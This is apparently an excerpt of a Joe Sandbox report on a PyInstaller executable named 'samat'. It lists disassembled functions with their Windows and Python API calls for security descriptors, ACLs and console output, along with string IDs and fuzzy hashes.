                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                      • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                                                      • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                                                                      • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                                                                      • Instruction ID: e87a00a17ac7ee17782615e2d05f2ad3334025735a3d0b5fada15cdec6019ce9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86219F32B1878186E721AB55B8427E6A298BB88380F800137FE8D93659DFBCD255C751
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 995526605-0
                                                                                                                                                                                                                                                                                      • Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                                                                      • Instruction ID: 8bc466157fc79f4e4760f11b050d3a7fb52429372c27907ffbf0425d94d04ff1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC217331B0C64246EB10AB55F94532AE7A8FF817A0F918237EA6C83AE4DEFDD445C711
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 955e69dbdd4f648e313349aefb080b734bae4ce698d47d394c7c697acdce6f2d
                                                                                                                                                                                                                                                                                      • Instruction ID: cbe752d339cda4b514402ae2a68cbe1883052c87cb2be649235c8fd76e151e2b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 955e69dbdd4f648e313349aefb080b734bae4ce698d47d394c7c697acdce6f2d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76216D22B0C24242FB657332DD6737DD14A6F497A0F804636D83E47ACADEBDE4118326
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_DescriptorParseSecurityTupleValid
                                                                                                                                                                                                                                                                                      • String ID: :GetSecurityDescriptorSacl$GetSecurityDescriptorSacl$GetSecurityDescriptorSacl - invalid sd
                                                                                                                                                                                                                                                                                      • API String ID: 1292091245-3167575759
                                                                                                                                                                                                                                                                                      • Opcode ID: 51e9e47e3c590d4bcffd20fb1b34e3be24bc56202da4389d4add24541a4b39de
                                                                                                                                                                                                                                                                                      • Instruction ID: 2eaf3aecc7df46e98ef57867f8065537d808c4d779c0bf2b0a71060de1ede0a9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51e9e47e3c590d4bcffd20fb1b34e3be24bc56202da4389d4add24541a4b39de
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E112CA6E2874282FB558B5DE8402BD63A0AF85FD4F884435DF0D463B6EE3CE599C710
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_DescriptorParseSecurityTupleValid
                                                                                                                                                                                                                                                                                      • String ID: :GetSecurityDescriptorDacl$GetSecurityDescriptorDacl$SetSecurityDescriptorGroup - invalid sd
                                                                                                                                                                                                                                                                                      • API String ID: 1292091245-161903415
                                                                                                                                                                                                                                                                                      • Opcode ID: a70b8841fd3bb74fb48fc43b83994f4796f0aa5c67d2f1f93a678df09f3010b5
                                                                                                                                                                                                                                                                                      • Instruction ID: 1bea2b1e0e09c3652626a01ec327c98b74569b9968d5c6399d2d81b985fa97de
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a70b8841fd3bb74fb48fc43b83994f4796f0aa5c67d2f1f93a678df09f3010b5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68113D66E2874292FB458B9DE8402BD63A1AF84FD4F884035DF0D463B6EE3CD595CB10
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_DescriptorParseSecurityTupleValid
                                                                                                                                                                                                                                                                                      • String ID: :GetSecurityDescriptorGroup$GetSecurityDescriptorGroup$GetSecurityDescriptorGroup - invalid sd
                                                                                                                                                                                                                                                                                      • API String ID: 1292091245-1740808346
                                                                                                                                                                                                                                                                                      • Opcode ID: de9d71227a1b018458c6f32488d96044086d18eae158601c7319b79526419fff
                                                                                                                                                                                                                                                                                      • Instruction ID: 8b1e773ffcf44ebc1b2dbdfd79a1fe8c892aaf2af06d1ca2b2edd7fbae9db13b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de9d71227a1b018458c6f32488d96044086d18eae158601c7319b79526419fff
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C114262E1870282FB549B9EE85027D22A1AF85FC4F885031DF0D863B6EE3DD9D5C710
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLastValidmalloc
                                                                                                                                                                                                                                                                                      • String ID: PySID:$PySID: Invalid SID
                                                                                                                                                                                                                                                                                      • API String ID: 814871005-2976353951
                                                                                                                                                                                                                                                                                      • Opcode ID: bca7d20094dae963d8d92a0c666da5fa3ed3a1cb4ec8201cbe5f052b776f9036
                                                                                                                                                                                                                                                                                      • Instruction ID: 1e68782e466ee7957265cf9f612cb43a7f80f39acfae73ec8887b0faf24033e4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bca7d20094dae963d8d92a0c666da5fa3ed3a1cb4ec8201cbe5f052b776f9036
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1218B62A18B8682EB448B59E4441BD6361EF44FE0F846131EB2E037A5DF3CD494C700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E8431E
                                                                                                                                                                                                                                                                                      • GetAuditedPermissionsFromAclW.ADVAPI32 ref: 00007FF8B7E8434E
                                                                                                                                                                                                                                                                                      • Py_BuildValue.PYTHON313 ref: 00007FF8B7E84378
                                                                                                                                                                                                                                                                                      • PyMem_Free.PYTHON313 ref: 00007FF8B7E84392
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C41B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C48A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: PyUnicode_DecodeMBCS.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C568
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: Py_BuildValue.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C57D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C595
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: PyErr_SetObject.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C5AA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: BuildFreeValue$Arg_AuditedDecodeErr_ErrorFormatFromLastLocalMem_MessageObjectParsePermissionsTupleUnicode_
                                                                                                                                                                                                                                                                                      • String ID: GetAuditedPermissionsFromAcl$O:GetAuditedPermissionsFromAcl
                                                                                                                                                                                                                                                                                      • API String ID: 779572743-1982696749
                                                                                                                                                                                                                                                                                      • Opcode ID: 6b9190123efeffe16bc3b1fe5c1430e533b7fa5cc7966d83ebfbad101224fffd
                                                                                                                                                                                                                                                                                      • Instruction ID: bbdd1b6690ab80b505b7813037967668a0684617586be32c3152b2425857e680
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b9190123efeffe16bc3b1fe5c1430e533b7fa5cc7966d83ebfbad101224fffd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7711FC72A0874692EB108F5AE4400AEA7A0FF85BD4F844036EB4E47669DF7CE545CB40
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_$BufferBuffer_FormatObject_ReleaseString
                                                                                                                                                                                                                                                                                      • String ID: Buffer cannot be None$Buffer length can be at most %d characters
                                                                                                                                                                                                                                                                                      • API String ID: 3539591379-686265896
                                                                                                                                                                                                                                                                                      • Opcode ID: 0da5e900bf8a33f3c475dd51dd89b2333c16a9d0b82ae7c2ec69a96980702169
                                                                                                                                                                                                                                                                                      • Instruction ID: c151474359ff0803658686034f71050b3eb2f208f5b3683d2280b354cc00ff51
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0da5e900bf8a33f3c475dd51dd89b2333c16a9d0b82ae7c2ec69a96980702169
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C110762A19B0282EF148B9AA84463C62A1EF89FD4F485035EE5E867B5DF3CE495C300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_ParseTuple
                                                                                                                                                                                                                                                                                      • String ID: Ace type %d is not supported yet$GetAce$l:GetAce
                                                                                                                                                                                                                                                                                      • API String ID: 3371842430-2172617993
                                                                                                                                                                                                                                                                                      • Opcode ID: c9224e87bc8317b6439b7db474916c839e8cf08f52e6895d905d1aca719b8969
                                                                                                                                                                                                                                                                                      • Instruction ID: 31a1de3b490d290125ca70a0c1e1942661429b2f543b704a11e7c3049029822f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9224e87bc8317b6439b7db474916c839e8cf08f52e6895d905d1aca719b8969
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE110D72A08B4282EB018B59E84007D73A5FF85FC4F944132DB5D536B9DE3CE565CB10
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E8425A
                                                                                                                                                                                                                                                                                      • GetEffectiveRightsFromAclW.ADVAPI32 ref: 00007FF8B7E84285
                                                                                                                                                                                                                                                                                      • Py_BuildValue.PYTHON313 ref: 00007FF8B7E842AA
                                                                                                                                                                                                                                                                                      • PyMem_Free.PYTHON313 ref: 00007FF8B7E842C4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C41B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C48A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: PyUnicode_DecodeMBCS.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C568
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: Py_BuildValue.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C57D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C595
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: PyErr_SetObject.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C5AA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: BuildFreeValue$Arg_DecodeEffectiveErr_ErrorFormatFromLastLocalMem_MessageObjectParseRightsTupleUnicode_
                                                                                                                                                                                                                                                                                      • String ID: GetEffectiveRightsFromAcl$O:GetEffectiveRightsFromAcl
                                                                                                                                                                                                                                                                                      • API String ID: 2073598658-568366055
                                                                                                                                                                                                                                                                                      • Opcode ID: 247de53edbba7a4271bbf513ae11bb24d89cab06e9711837b0c51d0caff24205
                                                                                                                                                                                                                                                                                      • Instruction ID: 59feafb8e103d7bdc32a6259f83bd9f7acf14101436ba55bc337aa763fd3ded2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 247de53edbba7a4271bbf513ae11bb24d89cab06e9711837b0c51d0caff24205
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22114C22A0C74692EB409F9AF4401BEA3A0FF89BD4F844132EB5E47669DF7CE555CB00
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                                      • String ID: CONOUT$
                                                                                                                                                                                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                                                      • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                                                                      • Instruction ID: bfea000aa6e60dccb14b08a83649aad203dbd2a48a814ffa7f3037fccc8b588b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F11B131B18A4182E751AB52EC46329A2A8FB88BF4F844236EA5DC7794CFBCD8108751
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_ParseTuple$ClearErr_
                                                                                                                                                                                                                                                                                      • String ID: AddAccesDeniedAce$lO:AddAccessDeniedAce$llO:AddAccessDeniedAce
                                                                                                                                                                                                                                                                                      • API String ID: 2492218514-45297876
                                                                                                                                                                                                                                                                                      • Opcode ID: 9257cef95fa0abca0fdc74fa17bf64a4a18db8c9670460e5b188c7a4c9a2dfc3
